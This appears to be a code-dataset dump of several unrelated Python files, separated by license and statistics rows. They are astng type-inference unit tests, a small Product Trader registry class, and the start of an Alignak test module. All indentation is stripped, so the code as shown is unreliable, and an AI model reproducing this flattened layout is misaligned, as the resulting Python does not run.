self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['h'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_advanced_tupleassign_name_inference2(self):
infered = self.astng['i'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, u"glup")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['j'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['k'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_swap_assign_inference(self):
infered = self.astng.locals['a'][1].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng.locals['b'][1].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference1(self):
infered = self.astng['ex'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference2(self):
infered = get_node_of_class(self.astng['C']['meth2'], nodes.Getattr).infer()
meth1 = infered.next()
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference3(self):
infered = self.astng['C']['meth3']['b'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 4)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference4(self):
infered = self.astng['C']['meth3']['c'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "hop")
self.failUnlessRaises(StopIteration, infered.next)
def test_callfunc_inference(self):
infered = self.astng['v'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, Instance)
self.failUnlessEqual(meth1.name, 'object')
self.failUnlessEqual(meth1.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_unbound_method_inference(self):
infered = self.astng['m_unbound'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, UnboundMethod)
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.parent.frame().name, 'C')
self.failUnlessRaises(StopIteration, infered.next)
def test_bound_method_inference(self):
infered = self.astng['m_bound'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, BoundMethod)
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.parent.frame().name, 'C')
self.failUnlessRaises(StopIteration, infered.next)
def test_args_default_inference1(self):
optarg = get_name_node(self.astng['C']['meth1'], 'optarg')
infered = optarg.infer()
obj1 = infered.next()
self.assertIsInstance(obj1, nodes.Const)
self.failUnlessEqual(obj1.value, 0)
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_args_default_inference2(self):
infered = self.astng['C']['meth3'].ilookup('d')
obj1 = infered.next()
self.assertIsInstance(obj1, nodes.Const)
self.failUnlessEqual(obj1.value, 4)
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_inference_restrictions(self):
infered = get_name_node(self.astng['C']['meth1'], 'arg1').infer()
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_ancestors_inference(self):
code = '''
class A:
pass
class A(A):
pass
'''
astng = builder.string_build(code, __name__, __file__)
a1 = astng.locals['A'][0]
a2 = astng.locals['A'][1]
a2_ancestors = list(a2.ancestors())
self.failUnlessEqual(len(a2_ancestors), 1)
self.failUnless(a2_ancestors[0] is a1)
def test_ancestors_inference2(self):
code = '''
class A:
pass
class B(A): pass
class A(B):
pass
'''
astng = builder.string_build(code, __name__, __file__)
a1 = astng.locals['A'][0]
a2 = astng.locals['A'][1]
a2_ancestors = list(a2.ancestors())
self.failUnlessEqual(len(a2_ancestors), 2)
self.failUnless(a2_ancestors[0] is astng.locals['B'][0])
self.failUnless(a2_ancestors[1] is a1, a2_ancestors[1])
def test_f_arg_f(self):
code = '''
def f(f=1):
return f
a = f()
'''
astng = builder.string_build(code, __name__, __file__)
a = astng['a']
a_infered = a.infered()
self.failUnlessEqual(a_infered[0].value, 1)
self.assertEqual(len(a_infered), 1)
def test_exc_ancestors(self):
code = '''
def f():
raise NotImplementedError
'''
astng = builder.string_build(code, __name__, __file__)
error = astng.nodes_of_class(nodes.Name).next()
nie = error.infered()[0]
self.assertIsInstance(nie, nodes.Class)
nie_ancestors = [c.name for c in nie.ancestors()]
if sys.version_info < (3, 0):
self.failUnlessEqual(nie_ancestors, ['RuntimeError', 'StandardError', 'Exception', 'BaseException', 'object'])
else:
self.failUnlessEqual(nie_ancestors, ['RuntimeError', 'Exception', 'BaseException', 'object'])
def test_except_inference(self):
code = '''
try:
print (hop)
except NameError, ex:
ex1 = ex
except Exception, ex:
ex2 = ex
raise
'''
if sys.version_info >= (3, 0):
code = code.replace(', ex:', ' as ex:')
astng = builder.string_build(code, __name__, __file__)
ex1 = astng['ex1']
ex1_infer = ex1.infer()
ex1 = ex1_infer.next()
self.assertIsInstance(ex1, Instance)
self.failUnlessEqual(ex1.name, 'NameError')
self.failUnlessRaises(StopIteration, ex1_infer.next)
ex2 = astng['ex2']
ex2_infer = ex2.infer()
ex2 = ex2_infer.next()
self.assertIsInstance(ex2, Instance)
self.failUnlessEqual(ex2.name, 'Exception')
self.failUnlessRaises(StopIteration, ex2_infer.next)
def test_del1(self):
code = '''
del undefined_attr
'''
delete = builder.string_build(code, __name__, __file__).body[0]
self.failUnlessRaises(InferenceError, delete.infer)
def test_del2(self):
code = '''
a = 1
b = a
del a
c = a
a = 2
d = a
'''
astng = builder.string_build(code, __name__, __file__)
n = astng['b']
n_infer = n.infer()
infered = n_infer.next()
self.assertIsInstance(infered, nodes.Const)
self.failUnlessEqual(infered.value, 1)
self.failUnlessRaises(StopIteration, n_infer.next)
n = astng['c']
n_infer = n.infer()
self.failUnlessRaises(InferenceError, n_infer.next)
n = astng['d']
n_infer = n.infer()
infered = n_infer.next()
self.assertIsInstance(infered, nodes.Const)
self.failUnlessEqual(infered.value, 2)
self.failUnlessRaises(StopIteration, n_infer.next)
def test_builtin_types(self):
code = '''
l = [1]
t = (2,)
d = {}
s = ''
s2 = '_'
'''
astng = builder.string_build(code, __name__, __file__)
n = astng['l']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.List)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.getitem(0).value, 1)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'list')
self.failUnless('append' in infered._proxied.locals)
n = astng['t']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Tuple)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.getitem(0).value, 2)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'tuple')
n = astng['d']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Dict)
self.assertIsInstance(infered, Instance)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'dict')
self.failUnless('get' in infered._proxied.locals)
n = astng['s']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Const)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.name, 'str')
self.failUnless('lower' in infered._proxied.locals)
n = astng['s2']
infered = n.infer().next()
self.failUnlessEqual(infered.getitem(0).value, '_')
def test_unicode_type(self):
if sys.version_info >= (3, 0):
self.skipTest('unicode removed on py >= 3.0')
code = '''u = u""'''
astng = builder.string_build(code, __name__, __file__)
n = astng['u']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Const)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.name, 'unicode')
self.failUnless('lower' in infered._proxied.locals)
def test_descriptor_are_callable(self):
code = '''
class A:
statm = staticmethod(open)
clsm = classmethod('whatever')
'''
astng = builder.string_build(code, __name__, __file__)
statm = astng['A'].igetattr('statm').next()
self.failUnless(statm.callable())
clsm = astng['A'].igetattr('clsm').next()
self.failUnless(clsm.callable())
def test_bt_ancestor_crash(self):
code = '''
class Warning(Warning):
pass
'''
astng = builder.string_build(code, __name__, __file__)
w = astng['Warning']
ancestors = w.ancestors()
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'Warning')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'Exception')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'BaseException')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'object')
self.failUnlessEqual(ancestor.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, ancestors.next)
def test_qqch(self):
code = '''
from logilab.common.modutils import load_module_from_name
xxx = load_module_from_name('__pkginfo__')
'''
astng = builder.string_build(code, __name__, __file__)
xxx = astng['xxx']
self.assertSetEqual(set(n.__class__ for n in xxx.infered()),
set([nodes.Const, YES.__class__]))
def test_method_argument(self):
code = '''
class ErudiEntitySchema:
"""a entity has a type, a set of subject and or object relations"""
def __init__(self, e_type, **kwargs):
kwargs['e_type'] = e_type.capitalize().encode()
def meth(self, e_type, *args, **kwargs):
kwargs['e_type'] = e_type.capitalize().encode()
print(args)
'''
astng = builder.string_build(code, __name__, __file__)
arg = get_name_node(astng['ErudiEntitySchema']['__init__'], 'e_type')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[YES.__class__])
arg = get_name_node(astng['ErudiEntitySchema']['__init__'], 'kwargs')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Dict])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'e_type')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[YES.__class__])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'args')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Tuple])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'kwargs')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Dict])
def test_tuple_then_list(self):
code = '''
def test_view(rql, vid, tags=()):
tags = list(tags)
tags.append(vid)
'''
astng = builder.string_build(code, __name__, __file__)
name = get_name_node(astng['test_view'], 'tags', -1)
it = name.infer()
tags = it.next()
self.failUnlessEqual(tags.__class__, Instance)
self.failUnlessEqual(tags._proxied.name, 'list')
self.failUnlessRaises(StopIteration, it.next)
def test_mulassign_inference(self):
code = '''
def first_word(line):
"""Return the first word of a line"""
return line.split()[0]
def last_word(line):
"""Return last word of a line"""
return line.split()[-1]
def process_line(word_pos):
"""Silly function: returns (ok, callable) based on argument.
For test purpose only.
"""
if word_pos > 0:
return (True, first_word)
elif word_pos < 0:
return (True, last_word)
else:
return (False, None)
if __name__ == '__main__':
line_number = 0
for a_line in file('test_callable.py'):
tupletest = process_line(line_number)
(ok, fct) = process_line(line_number)
if ok:
fct(a_line)
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual(len(list(astng['process_line'].infer_call_result(
None))), 3)
self.failUnlessEqual(len(list(astng['tupletest'].infer())), 3)
values = ['Function(first_word)', 'Function(last_word)', 'Const(NoneType)']
self.failUnlessEqual([str(infered)
for infered in astng['fct'].infer()], values)
def test_float_complex_ambiguity(self):
code = '''
def no_conjugate_member(magic_flag):
"""should not raise E1101 on something.conjugate"""
if magic_flag:
something = 1.0
else:
something = 1.0j
if isinstance(something, float):
return something
return something.conjugate()
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
astng['no_conjugate_member'].ilookup('something')], [1.0, 1.0j])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'something', -1).infer()], [1.0, 1.0j])
def test_lookup_cond_branches(self):
code = '''
def no_conjugate_member(magic_flag):
"""should not raise E1101 on something.conjugate"""
something = 1.0
if magic_flag:
something = 1.0j
return something.conjugate()
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'something', -1).infer()], [1.0, 1.0j])
def test_simple_subscript(self):
code = '''
a = [1, 2, 3][0]
b = (1, 2, 3)[1]
c = (1, 2, 3)[-1]
d = a + b + c
print (d)
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'a', -1).infer()], [1])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'b', -1).infer()], [2])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'c', -1).infer()], [3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [6])
#def test_simple_tuple(self):
#"""test case for a simple tuple value"""
## XXX tuple inference is not implemented ...
#code = """
#a = (1,)
#b = (22,)
#some = a + b
#"""
#astng = builder.string_build(code, __name__, __file__)
#self.failUnlessEqual(astng['some'].infer.next().as_string(), "(1, 22)")
def test_simple_for(self):
code = '''
for a in [1, 2, 3]:
print (a)
for b,c in [(1,2), (3,4)]:
print (b)
print (c)
print ([(d,e) for e,d in ([1,2], [3,4])])
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'a', -1).infer()], [1, 2, 3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'b', -1).infer()], [1, 3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'c', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'e', -1).infer()], [1, 3])
def test_simple_for_genexpr(self):
code = '''
print ((d,e) for e,d in ([1,2], [3,4]))
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'e', -1).infer()], [1, 3])
def test_builtin_help(self):
code = '''
help()
'''
# XXX failing since __builtin__.help assignment has
# been moved into a function...
astng = builder.string_build(code, __name__, __file__)
node = get_name_node(astng, 'help', -1)
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1, infered)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(str(infered[0]),
'Instance of site._Helper')
def test_builtin_open(self):
code = '''
open("toto.txt")
'''
astng = builder.string_build(code, __name__, __file__)
node = get_name_node(astng, 'open', -1)
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
self.failUnlessEqual(infered[0].name, 'open')
def test_callfunc_context_func(self):
code = '''
def mirror(arg=None):
return arg
un = mirror(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('un'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, 1)
def test_callfunc_context_lambda(self):
code = '''
mirror = lambda x=None: x
un = mirror(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('mirror'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Lambda)
infered = list(astng.igetattr('un'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, 1)
def test_factory_method(self):
code = '''
class Super(object):
@classmethod
def instance(cls):
return cls()
class Sub(Super):
def method(self):
print ('method called')
sub = Sub.instance()
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('sub'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(infered[0]._proxied.name, 'Sub')
def test_import_as(self):
code = '''
import os.path as osp
print (osp.dirname(__file__))
from os.path import exists as e
assert e(__file__)
from new import code as make_code
print (make_code)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('osp'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Module)
self.failUnlessEqual(infered[0].name, 'os.path')
infered = list(astng.igetattr('e'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
self.failUnlessEqual(infered[0].name, 'exists')
if sys.version_info >= (3, 0):
self.skipTest('<new> module has been removed')
infered = list(astng.igetattr('make_code'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(str(infered[0]),
'Instance of %s.type' % BUILTINS_NAME)
def _test_const_infered(self, node, value):
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, value)
def test_unary_not(self):
for code in ('a = not (1,); b = not ()',
'a = not {1:2}; b = not {}'):
astng = builder.string_build(code, __name__, __file__)
self._test_const_infered(astng['a'], False)
self._test_const_infered(astng['b'], True)
def test_binary_op_int_add(self):
astng = builder.string_build('a = 1 + 2', __name__, __file__)
self._test_const_infered(astng['a'], 3)
def test_binary_op_int_sub(self):
astng = builder.string_build('a = 1 - 2', __name__, __file__)
self._test_const_infered(astng['a'], -1)
def test_binary_op_float_div(self):
astng = builder.string_build('a = 1 / 2.', __name__, __file__)
self._test_const_infered(astng['a'], 1 / 2.)
def test_binary_op_str_mul(self):
astng = builder.string_build('a = "*" * 40', __name__, __file__)
self._test_const_infered(astng['a'], "*" * 40)
def test_binary_op_bitand(self):
astng = builder.string_build('a = 23&20', __name__, __file__)
self._test_const_infered(astng['a'], 23&20)
def test_binary_op_bitor(self):
astng = builder.string_build('a = 23|8', __name__, __file__)
self._test_const_infered(astng['a'], 23|8)
def test_binary_op_bitxor(self):
astng = builder.string_build('a = 23^9', __name__, __file__)
self._test_const_infered(astng['a'], 23^9)
def test_binary_op_shiftright(self):
astng = builder.string_build('a = 23 >>1', __name__, __file__)
self._test_const_infered(astng['a'], 23>>1)
def test_binary_op_shiftleft(self):
astng = builder.string_build('a = 23 <<1', __name__, __file__)
self._test_const_infered(astng['a'], 23<<1)
def test_binary_op_list_mul(self):
for code in ('a = [[]] * 2', 'a = 2 * [[]]'):
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['a'].infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.List)
self.failUnlessEqual(len(infered[0].elts), 2)
self.assertIsInstance(infered[0].elts[0], nodes.List)
self.assertIsInstance(infered[0].elts[1], nodes.List)
def test_binary_op_list_mul_none(self):
'test correct handling on list multiplied by None'
astng = builder.string_build( 'a = [1] * None\nb = [1] * "r"')
infered = astng['a'].infered()
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0], YES)
infered = astng['b'].infered()
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0], YES)
def test_binary_op_tuple_add(self):
astng = builder.string_build('a = (1,) + (2,)', __name__, __file__)
infered = list(astng['a'].infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Tuple)
self.failUnlessEqual(len(infered[0].elts), 2)
self.failUnlessEqual(infered[0].elts[0].value, 1)
self.failUnlessEqual(infered[0].elts[1].value, 2)
def test_binary_op_custom_class(self):
code = '''
class myarray:
def __init__(self, array):
self.array = array
def __mul__(self, x):
return myarray([2,4,6])
def astype(self):
return "ASTYPE"
def randint(maximum):
if maximum is not None:
return myarray([1,2,3]) * 2
else:
return int(5)
x = randint(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('x'))
self.failUnlessEqual(len(infered), 2)
value = [str(v) for v in infered]
# The __name__ trick here makes it work when invoked directly
# (__name__ == '__main__') and through pytest (__name__ ==
# 'unittest_inference')
self.assertEqual(value, ['Instance of %s.myarray' % __name__,
'Instance of %s.int' % BUILTINS_NAME])
def test_nonregr_lambda_arg(self):
code = '''
def f(g = lambda: None):
g().x
'''
astng = builder.string_build(code, __name__, __file__)
callfuncnode = astng['f'].body[0].value.expr
infered = list(callfuncnode.infer())
self.failUnlessEqual(len(infered), 2, infered)
infered.remove(YES)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, None)
def test_nonregr_getitem_empty_tuple(self):
code = '''
def f(x):
a = ()[x]
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['f'].ilookup('a'))
self.failUnlessEqual(len(infered), 1)
self.failUnlessEqual(infered[0], YES)
def test_python25_generator_exit(self):
sys.stderr = StringIO()
data = "b = {}[str(0)+''].a"
astng = builder.string_build(data, __name__, __file__)
list(astng['b'].infer())
output = sys.stderr.getvalue()
# I have no idea how to test for this in another way...
self.failIf("RuntimeError" in output, "Exception exceptions.RuntimeError: 'generator ignored GeneratorExit' in <generator object> ignored")
sys.stderr = sys.__stderr__
def test_python25_relative_import(self):
data = "from ...common import date; print (date)"
# !! FIXME also this relative import would not work 'in real' (no __init__.py in test/)
# the test works since we pretend we have a package by passing the full modname
astng = builder.string_build(data, 'logilab.astng.test.unittest_inference', __file__)
infered = get_name_node(astng, 'date').infer().next()
self.assertIsInstance(infered, nodes.Module)
self.assertEqual(infered.name, 'logilab.common.date')
def test_python25_no_relative_import(self):
fname = join(abspath(dirname(__file__)), 'regrtest_data', 'package', 'absimport.py')
astng = builder.file_build(fname, 'absimport')
self.failUnless(astng.absolute_import_activated(), True)
infered = get_name_node(astng, 'import_package_subpackage_module').infer().next()
# failed to import since absolute_import is activated
self.failUnless(infered is YES)
def test_nonregr_absolute_import(self):
fname = join(abspath(dirname(__file__)), 'regrtest_data', 'absimp', 'string.py')
astng = builder.file_build(fname, 'absimp.string')
self.failUnless(astng.absolute_import_activated(), True)
infered = get_name_node(astng, 'string').infer().next()
self.assertIsInstance(infered, nodes.Module)
self.assertEqual(infered.name, 'string')
self.failUnless('lower' in infered.locals)
def test_mechanize_open(self):
try:
import mechanize
except ImportError:
self.skipTest('require mechanize installed')
data = '''from mechanize import Browser
print (Browser)
b = Browser()
'''
astng = builder.string_build(data, __name__, __file__)
browser = get_name_node(astng, 'Browser').infer().next()
self.assertIsInstance(browser, nodes.Class)
bopen = list(browser.igetattr('open'))
self.skipTest('the commit said: "huum, see that later"')
self.assertEqual(len(bopen), 1)
self.assertIsInstance(bopen[0], nodes.Function)
self.failUnless(bopen[0].callable())
b = get_name_node(astng, 'b').infer().next()
self.assertIsInstance(b, Instance)
bopen = list(b.igetattr('open'))
self.assertEqual(len(bopen), 1)
self.assertIsInstance(bopen[0], BoundMethod)
self.failUnless(bopen[0].callable())
def test_property(self):
code = '''
from smtplib import SMTP
class SendMailController(object):
@property
def smtp(self):
return SMTP(mailhost, port)
@property
def me(self):
return self
my_smtp = SendMailController().smtp
my_me = SendMailController().me
'''
decorators = set(['%s.property' % BUILTINS_NAME])
astng = builder.string_build(code, __name__, __file__)
self.assertEqual(astng['SendMailController']['smtp'].decoratornames(),
decorators)
propinfered = list(astng.body[2].value.infer())
self.assertEqual(len(propinfered), 1)
propinfered = propinfered[0]
self.assertIsInstance(propinfered, Instance)
self.assertEqual(propinfered.name, 'SMTP')
self.assertEqual(propinfered.root().name, 'smtplib')
self.assertEqual(astng['SendMailController']['me'].decoratornames(),
decorators)
propinfered = list(astng.body[3].value.infer())
self.assertEqual(len(propinfered), 1)
propinfered = propinfered[0]
self.assertIsInstance(propinfered, Instance)
self.assertEqual(propinfered.name, 'SendMailController')
self.assertEqual(propinfered.root().name, __name__)
def test_im_func_unwrap(self):
code = '''
class EnvBasedTC:
def pactions(self):
pass
pactions = EnvBasedTC.pactions.im_func
print (pactions)
class EnvBasedTC2:
pactions = EnvBasedTC.pactions.im_func
print (pactions)
'''
astng = builder.string_build(code, __name__, __file__)
pactions = get_name_node(astng, 'pactions')
infered = list(pactions.infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
pactions = get_name_node(astng['EnvBasedTC2'], 'pactions')
infered = list(pactions.infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
def test_augassign(self):
code = '''
a = 1
a += 2
print (a)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(get_name_node(astng, 'a').infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.assertEqual(infered[0].value, 3)
def test_nonregr_func_arg(self):
code = '''
def foo(self, bar):
def baz():
pass
def qux():
return baz
spam = bar(None, qux)
print (spam)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(get_name_node(astng['foo'], 'spam').infer())
self.assertEqual(len(infered), 1)
self.assertIs(infered[0], YES)
def test_nonregr_func_global(self):
code = '''
active_application = None
def get_active_application():
global active_application
return active_application
class Application(object):
def __init__(self):
global active_application
active_application = self
class DataManager(object):
def __init__(self, app=None):
self.app = get_active_application()
def test(self):
p = self.app
print (p)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(Instance(astng['DataManager']).igetattr('app'))
self.assertEqual(len(infered), 2, infered) # None / Instance(Application)
infered = list(get_name_node(astng['DataManager']['test'], 'p').infer())
self.assertEqual(len(infered), 2, infered)
for node in infered:
if isinstance(node, Instance) and node.name == 'Application':
break
else:
self.fail('expected to find an instance of Application in %s' % infered)
def test_list_inference(self):
"""#20464"""
code = '''
import optparse
A = []
B = []
def test():
xyz = [
"foobar=%s" % options.ca,
] + A + B
if options.bind is not None:
xyz.append("bind=%s" % options.bind)
return xyz
def main():
global options
parser = optparse.OptionParser()
(options, args) = parser.parse_args()
Z = test()
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['Z'].infer())
self.assertEqual(len(infered), 1, infered)
self.assertIsInstance(infered[0], Instance)
self.assertIsInstance(infered[0]._proxied, nodes.Class)
self.assertEqual(infered[0]._proxied.name, 'list')
def test__new__(self):
code = '''
class NewTest(object):
"doc"
def __new__(cls, arg):
self = object.__new__(cls)
self.arg = arg
return self
n = NewTest()
'''
astng = builder.string_build(code, __name__, __file__)
self.assertRaises(InferenceError, list, astng['NewTest'].igetattr('arg'))
n = astng['n'].infer().next()
infered = list(n.igetattr('arg'))
self.assertEqual(len(infered), 1, infered)
def test_two_parents_from_same_module(self):
code = '''
from data import nonregr
class Xxx(nonregr.Aaa, nonregr.Ccc):
"doc"
'''
astng = builder.string_build(code, __name__, __file__)
parents = list(astng['Xxx'].ancestors())
self.assertEqual(len(parents), 3, parents) # Aaa, Ccc, object
if __name__ == '__main__':
unittest_main()
| gpl-3.0 | 3,295,323,266,890,843,000 | 34.926638 | 147 | 0.594953 | false |
virtualnobi/MediaFiler | nobi/ProductTraderPattern.py | 1 | 2526 | """Product Trader Pattern
This class implements a simple version of the Product Trader Pattern:
A SimpleProductTrader manages a registry mapping specifications to classes.
Strings are used as Specification.
For each Product, a SimpleProductTrader is created.
Subclasses of Product register with this SimpleProductTrader.
To instantiate a (subclass of) Product, the appropriate class is retrieved
from the SimpleProductTrader using the Specification.
(c) by nobisoft 2015-
"""
# Imports
## Standard
from __future__ import absolute_import
import logging
## Contributed
## nobi
## Project
# Package Variables
Logger = logging.getLogger(__name__)
class SimpleProductTrader(object):
"""Implement a simple Product Trader, using strings to specify the class to instantiate.
"""
# Constants
# Class Methods
# Lifecycle
def __init__(self):
"""Create a SimpleProductTrader with empty registry.
"""
# inheritance
super(SimpleProductTrader, self).__init__()
# internal state
self.productRegistry = {} # mapping String to Class
#
return(None)
# Getters
def isKnown(self, specString):
"""Return True is specString is a known specification, i.e., getClassFor() would return a valid class.
String specString
Return Boolean
"""
return(specString in self.productRegistry)
def getClassFor(self, specString):
"""Return the class to which specString is mapped.
BaseException when specString was not registered.
Returns Class
"""
if (self.isKnown(specString)):
return(self.productRegistry[specString])
else:
raise(BaseException('Specification "%s" not found in registry of SimpleProductTrader' % specString))
def getClasses(self):
"""Return the set of classes registered.
"""
return(set(self.productRegistry.values()))
# Setters
def registerClassFor(self, clas, specString):
"""Inform the product trader that clas handles specString.
"""
if (specString in self.productRegistry):
# raise(BaseException('Specification "%s" already used in SimpleProductTrader' % specString))
Logger.warning('Overwriting specification "%s" in SimpleProductTrader' % specString)
self.productRegistry[specString] = clas
| gpl-3.0 | -2,615,523,185,855,493,600 | 26.382022 | 112 | 0.644101 | false |
Alignak-monitoring/alignak | tests/test_satellite_link.py | 1 | 3229 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2018: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
from .alignak_test import AlignakTest
from alignak.objects.arbiterlink import ArbiterLink
from alignak.objects.schedulerlink import SchedulerLink
from alignak.objects.brokerlink import BrokerLink
from alignak.objects.reactionnerlink import ReactionnerLink
from alignak.objects.receiverlink import ReceiverLink
from alignak.objects.pollerlink import PollerLink
